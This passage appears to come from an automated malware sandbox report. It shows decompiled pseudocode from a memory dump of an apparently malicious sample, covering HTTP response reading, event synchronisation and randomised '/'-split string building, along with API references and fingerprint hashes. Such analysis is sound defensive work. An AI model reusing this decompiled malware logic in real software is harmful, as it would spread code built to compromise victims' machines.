				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0x7f7d134() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x7f7d164(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E07F71525(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0x7f7d134() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E07F729C0( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E07F78B22(_v16);
										if(_t64 == 0) {
											_t64 = E07F748CB(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E07F729C0( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E07F757DD(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}

0x07f75988
0x07f75989
0x07f7598f
0x07f7599a
0x07f7599a
0x07f7599c
0x07f7a556
0x07f7a55b
0x07f7a55d
0x07f7a562
0x07f7a563
0x07f7a568
0x07f7a569
0x07f7a574
0x07f7a5a5
0x07f7a5aa
0x07f7a66d
0x07f7a5b0
0x07f7a5b7
0x07f7a5bf
0x07f7a66a
0x07f7a5c5
0x07f7a5ca
0x07f7a5cf
0x07f7a5d4
0x07f7a65c
0x07f7a5da
0x07f7a5da
0x07f7a5dc
0x07f7a5e2
0x07f7a5e3
0x07f7a5e3
0x07f7a5e6
0x07f7a5e9
0x07f7a5ef
0x07f7a5f4
0x07f7a5f5
0x07f7a5fa
0x07f7a5fd
0x07f7a608
0x00000000
0x00000000
0x07f7a610
0x07f7a618
0x07f7a624
0x07f7a628
0x07f7a62a
0x07f7a62f
0x00000000
0x00000000
0x07f7a62f
0x07f7a628
0x07f7a641
0x07f7a644
0x07f7a64b
0x07f7a656
0x07f7a656
0x00000000
0x07f7a631
0x07f7a631
0x07f7a636
0x07f7a638
0x07f7a639
0x07f7a63c
0x00000000
0x07f7a63c
0x00000000
0x07f7a636
0x07f7a5e3
0x07f7a65d
0x07f7a65d
0x07f7a663
0x07f7a663
0x07f7a5bf
0x07f7a576
0x07f7a57c
0x07f7a584
0x07f7a59d
0x07f7a59f
0x00000000
0x00000000
0x07f7a586
0x07f7a590
0x07f7a594
0x07f7a59a
0x00000000
0x07f7a59a
0x07f7a594
0x07f7a584
0x07f7a676
0x07f75991
0x07f75991
0x07f75998
0x07f759a3
0x00000000
0x00000000
0x00000000
0x07f75998

APIs

ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,751881D0), ref: 07F7A55D
GetLastError.KERNEL32(?,?,?,00000000,751881D0), ref: 07F7A576
ResetEvent.KERNEL32(?), ref: 07F7A5EF
GetLastError.KERNEL32 ref: 07F7A60A

Part of subcall function 07F757DD: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 07F757F4
Part of subcall function 07F757DD: SetEvent.KERNEL32(?), ref: 07F75804
Part of subcall function 07F757DD: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 07F75836
Part of subcall function 07F757DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 07F7585B
Part of subcall function 07F757DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 07F7587B

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: EventHttpInfoQuery$ErrorLastReset$ObjectSingleWait
String ID:
API String ID: 2176574591-0
Opcode ID: c47952009e76390ed71288050e25190f8d576b099254eec49fc818c0e1d55a1e
Instruction ID: d79ce3fd639858d90af579c60bc2c4ca99b98892a111f5bd2ff82c3d96adf3b9
Opcode Fuzzy Hash: c47952009e76390ed71288050e25190f8d576b099254eec49fc818c0e1d55a1e
Instruction Fuzzy Hash: 6C41D7B2A00605EBCB219BB8DC44F6E77B9EF84360F1A852AE552D7150EB70D941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 07F76150, Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E07F76150(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x7f7d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x7f7d2a8; // 0xaaa5a8
				_t3 = _t8 + 0x7f7e87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E07F710B1(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x7f7d2ac, 1, 0, _t30);
					E07F78B22(_t30);
				}
				_t12 =  *0x7f7d25c; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E07F78F1B() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E07F73485(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x7f7d10c( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E07F78B7B(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x07f76151
0x07f76158
0x07f76162
0x07f76166
0x07f7616c
0x07f7617b
0x07f76182
0x07f76186
0x07f76198
0x07f7619a
0x07f7619a
0x07f7619f
0x07f761a6
0x07f761fd
0x07f761fd
0x07f76203
0x07f76205
0x07f76205
0x07f7620f
0x07f76213
0x07f76225
0x07f76225
0x07f76229
0x07f7622f
0x07f7622f
0x00000000
0x07f761bf
0x07f761c4
0x07f761cc
0x07f761d0
0x07f761d4
0x07f761d4
0x07f761e1
0x07f761e5
0x07f761e9
0x07f7623e
0x07f76244
0x07f76244
0x07f761f7
0x07f761fb
0x07f76232
0x07f76234
0x07f76237
0x07f76237
0x00000000
0x07f76234
0x07f761fb
0x00000000
0x07f761e5

APIs

Part of subcall function 07F710B1: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,08A29D88,00000000,?,?,69B25F44,00000005,07F7D00C,?,?,07F730FE), ref: 07F710E7
Part of subcall function 07F710B1: lstrcpy.KERNEL32(00000000,00000000), ref: 07F7110B
Part of subcall function 07F710B1: lstrcat.KERNEL32(00000000,00000000), ref: 07F71113

CreateEventA.KERNEL32(07F7D2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,07F7991F,?,00000001,?), ref: 07F76191

Part of subcall function 07F78B22: RtlFreeHeap.NTDLL(00000000,00000000,07F7131A,00000000,?,?,00000000), ref: 07F78B2E

WaitForSingleObject.KERNEL32(00000000,00004E20,07F7991F,00000000,00000000,?,00000000,?,07F7991F,?,00000001,?,?,?,?,07F77D37), ref: 07F761F1
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,07F7991F,?,00000001,?), ref: 07F7621F
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,07F7991F,?,00000001,?,?,?,?,07F77D37), ref: 07F76237

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 1093d72b93f2e4930b3aee6c897eaea74742cdd6a64809634c06f1e37ab7eae5
Instruction ID: 216a10b2a864555b04a0473540d37d3e6b16fe72402d158305ac6dc5c0f37a66
Opcode Fuzzy Hash: 1093d72b93f2e4930b3aee6c897eaea74742cdd6a64809634c06f1e37ab7eae5
Instruction Fuzzy Hash: 022106F2E01B169BCB315E789C48AAB7399EF88B65B1D022BF945D7200DB64C802C691

Uniqueness

Uniqueness Score: -1.00%

Function 07F79870, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E07F79870(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E07F72931(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E07F78DAB(_t23);
						}
					}
					return _t38;
				}
				if(E07F7155A(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x7f7d2ac, 1, 0,  *0x7f7d344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E07F75BC0(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E07F74B2A(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E07F74FF0(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E07F76150( &_v32, _t39);
					goto L13;
				}
			}

0x07f79870
0x07f7987d
0x07f79883
0x07f79884
0x07f79885
0x07f79886
0x07f79887
0x07f7988b
0x07f79897
0x07f7989b
0x07f79923
0x07f79923
0x07f79926
0x07f79928
0x07f79930
0x07f79930
0x07f79936
0x07f79939
0x07f79939
0x07f79936
0x07f79944
0x07f79944
0x07f798ae
0x07f798b0
0x07f798b0
0x07f798c7
0x07f798cb
0x07f798ce
0x07f798d9
0x07f798e0
0x07f798e0
0x07f798e9
0x07f798ed
0x07f798fb
0x07f798ef
0x07f798ef
0x07f798f0
0x07f798f1
0x07f798f2
0x07f798f3
0x07f798f4
0x07f798f4
0x07f79900
0x07f79903
0x07f79907
0x07f79909
0x07f79909
0x07f79910
0x00000000
0x07f79912
0x07f79912
0x07f7991f
0x00000000
0x07f7991f

APIs

CreateEventA.KERNEL32(07F7D2AC,00000001,00000000,00000040,00000001,?,7519F710,00000000,7519F730,?,?,?,07F77D37,?,00000001,?), ref: 07F798C1
SetEvent.KERNEL32(00000000,?,?,?,07F77D37,?,00000001,?,00000002,?,?,07F7312C,?), ref: 07F798CE
Sleep.KERNEL32(00000BB8,?,?,?,07F77D37,?,00000001,?,00000002,?,?,07F7312C,?), ref: 07F798D9
CloseHandle.KERNEL32(00000000,?,?,?,07F77D37,?,00000001,?,00000002,?,?,07F7312C,?), ref: 07F798E0

Part of subcall function 07F75BC0: WaitForSingleObject.KERNEL32(00000000,?,?,?,07F79900,?,07F79900,?,?,?,?,?,07F79900,?), ref: 07F75C9A

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: 61363be653395e74b4bc7d22185f9428a4e17850cd34beec1663da266a2a7e51
Instruction ID: 5c31df5acc0bb444127fd668bbf67b8e9a02c674697a6468326a4dee7e9955f6
Opcode Fuzzy Hash: 61363be653395e74b4bc7d22185f9428a4e17850cd34beec1663da266a2a7e51
Instruction Fuzzy Hash: 1E2183F3D0021AEBDB10EFF8C8859AE77BDEF44250B09442BEA51E7200D6B4A945C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 07F75F58, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E07F75F58(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E07F71525(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x07f75f64
0x07f75f68
0x07f75f69
0x07f75f6a
0x07f75f6c
0x07f75f6e
0x07f75f71
0x07f75f76
0x07f7600d
0x07f76014
0x07f76014
0x07f75f7f
0x07f75f86
0x07f75f96
0x07f75f96
0x07f75f9c
0x07f75f9e
0x07f75fa3
0x07f75fac
0x07f75fb2
0x07f75fb7
0x07f75fc2
0x07f75fc6
0x07f75fc8
0x07f75fc9
0x07f75fd2
0x07f75fd6
0x07f75fe7
0x07f75fd8
0x07f75fdd
0x07f75fe2
0x07f75ff1
0x07f75ff1
0x07f75fc6
0x07f75ff7
0x07f75ffd
0x07f75ffd
0x07f76006
0x07f7600b
0x07f7600b
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 07F75F86
lstrlenW.KERNEL32(?), ref: 07F75FBC
memcpy.NTDLL(00000000,?,?,?), ref: 07F75FDD
SysFreeString.OLEAUT32(?), ref: 07F75FF1

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: d423f9e29d646b71ce171351dd52db6bc20644a9d51663c862e430f88bb57cf7
Instruction ID: 90f226eebdb538f59e16c64a95d569e2d3ba073053fd8c8f07522988aa86e0e9
Opcode Fuzzy Hash: d423f9e29d646b71ce171351dd52db6bc20644a9d51663c862e430f88bb57cf7
Instruction Fuzzy Hash: 8A213DB590160AEFDB11DFA8D8849DEBBB9FF49305B14416AE915E7244EB30DA04CF60

Uniqueness

Uniqueness Score: -1.00%

Function 07F7A41C, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E07F7A41C(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x7f7d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x7f7d250; // 0x79536596
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x7f7d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x07f7a424
0x07f7a427
0x07f7a42d
0x07f7a445
0x07f7a447
0x07f7a44c
0x07f7a44e
0x07f7a451
0x07f7a453
0x07f7a456
0x07f7a458
0x07f7a458
0x07f7a45a
0x07f7a465
0x07f7a46a
0x07f7a47b
0x07f7a483
0x07f7a488
0x07f7a48b
0x07f7a48e
0x07f7a490
0x07f7a493
0x07f7a496
0x07f7a496
0x07f7a499
0x07f7a4a4
0x07f7a4a9
0x07f7a4b3

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,07F77C20,00000000,?,?,07F79DA0,?,08A295B0), ref: 07F7A427
RtlAllocateHeap.NTDLL(00000000,?), ref: 07F7A43F
memcpy.NTDLL(00000000,?,-00000008,?,?,?,07F77C20,00000000,?,?,07F79DA0,?,08A295B0), ref: 07F7A483
memcpy.NTDLL(00000001,?,00000001), ref: 07F7A4A4

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: bd405115eb2787e55a7408df6e2bddd5bf78c223a84d279d77bc130b444d613d
Instruction ID: a770beb3837a23a268758b3d4665d3ddde21a3e03f1a9e77b8b9e072eb05323d
Opcode Fuzzy Hash: bd405115eb2787e55a7408df6e2bddd5bf78c223a84d279d77bc130b444d613d
Instruction Fuzzy Hash: D01129B2A04119AFC3108F69DC8AD9EBBBEDFC4361B19427AF404D7250EB749E01C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 07F78C01, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E07F78C01(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x07f78c0b
0x07f78c0f
0x07f78c24
0x07f78c26
0x07f78c2b
0x07f78c31
0x07f78c33
0x07f78c38
0x07f78c43
0x07f78c3a
0x07f78c3a
0x07f78c3a
0x07f78c38
0x07f78c51

APIs

memset.NTDLL ref: 07F78C0F
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 07F78C24
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 07F78C31
CloseHandle.KERNEL32(?), ref: 07F78C43

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 09356f4cdc850dcd500aad297727d2c929a093d66f72e837b6a0f94591c654c2
Instruction ID: 4cb28c6033cdf2c6f2b74169be7584146a9cacaeb0ab5cf4a5028dbecd1b7a3f
Opcode Fuzzy Hash: 09356f4cdc850dcd500aad297727d2c929a093d66f72e837b6a0f94591c654c2
Instruction Fuzzy Hash: DCF05EF550530CBFD3106F26DCC4C2BBBACEB8219DB15492EF14682111C676A849CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00981752, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00981752() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x9830f0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x9830fc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x9830ec = _t3;
						_t5 = GetCurrentProcessId();
						 *0x9830e8 = _t5;
						 *0x9830f0 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x9830e4 = _t6;
						if(_t6 == 0) {
							 *0x9830e4 =  *0x9830e4 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x00981753
0x00981761
0x00981767
0x0098176e
0x009817c5
0x009817c5
0x00981770
0x00981778
0x00981785
0x00981785
0x009817c1
0x009817c3
0x00000000
0x00000000
0x00000000
0x0098177a
0x00981781
0x00981787
0x00981787
0x0098178c
0x0098179a
0x0098179f
0x009817a5
0x009817ab
0x009817b2
0x009817b4
0x009817b4
0x009817be
0x00981783
0x00981783
0x00000000
0x00981783
0x00981781

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,009819AC), ref: 00981761
GetVersion.KERNEL32 ref: 00981770
GetCurrentProcessId.KERNEL32 ref: 0098178C
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 009817A5

Memory Dump Source

Source File: 00000009.00000002.517301857.0000000000981000.00000040.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000009.00000002.517286660.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.517312305.0000000000984000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.517328108.0000000000986000.00000040.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 1485d45b207166edeb48ffcc2e4e96765cf21833812fdcd17bfd8e6bda5e6fb6
Instruction ID: ed03d6dd509b334e0265eaa8f6e9d18a14d127773fb98bb956e2c000502e3826
Opcode Fuzzy Hash: 1485d45b207166edeb48ffcc2e4e96765cf21833812fdcd17bfd8e6bda5e6fb6
Instruction Fuzzy Hash: 02F0963166C3019BD721AF68BC06B943BADE704F11F10811AFA12DA3E0E771C582EB59

Uniqueness

Uniqueness Score: -1.00%

Function 07F74DB1, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E07F74DB1() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x7f7d26c; // 0x590
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x7f7d2bc; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x7f7d26c; // 0x590
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x7f7d238; // 0x8630000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x07f74db1
0x07f74db8
0x07f74e02
0x07f74e04
0x07f74e04
0x07f74dbc
0x07f74dc2
0x07f74dc7
0x07f74dcb
0x07f74dd1
0x07f74dd8
0x00000000
0x00000000
0x07f74dda
0x07f74ddf
0x00000000
0x00000000
0x00000000
0x07f74ddf
0x07f74de1
0x07f74de9
0x07f74dec
0x07f74dec
0x07f74df2
0x07f74df9
0x07f74dfc
0x07f74dfc
0x00000000

APIs

SetEvent.KERNEL32(00000590,00000001,07F77F41), ref: 07F74DBC
SleepEx.KERNEL32(00000064,00000001), ref: 07F74DCB
CloseHandle.KERNEL32(00000590), ref: 07F74DEC
HeapDestroy.KERNEL32(08630000), ref: 07F74DFC

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 614f19c0dc0422f6d126651ec6ad3b30aa0463c97135ef77f7222dfc284e6fee
Instruction ID: ecf22676993eaaf96f97fbc1babf79d58bae7f3cd23a7ba449cfbceebbb73b43
Opcode Fuzzy Hash: 614f19c0dc0422f6d126651ec6ad3b30aa0463c97135ef77f7222dfc284e6fee
Instruction Fuzzy Hash: E2F030F1F013569BDB205B35A84AF163B9CAF04766B484211B910D7790DF78C841D6B0

Uniqueness

Uniqueness Score: -1.00%

Function 07F79FF6, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E07F79FF6() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x7f7d32c; // 0x8a295b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x7f7d32c; // 0x8a295b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x7f7d32c; // 0x8a295b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x7f7e81a) {
					HeapFree( *0x7f7d238, 0, _t10);
					_t7 =  *0x7f7d32c; // 0x8a295b0
				}
				 *_t7 = _v0;
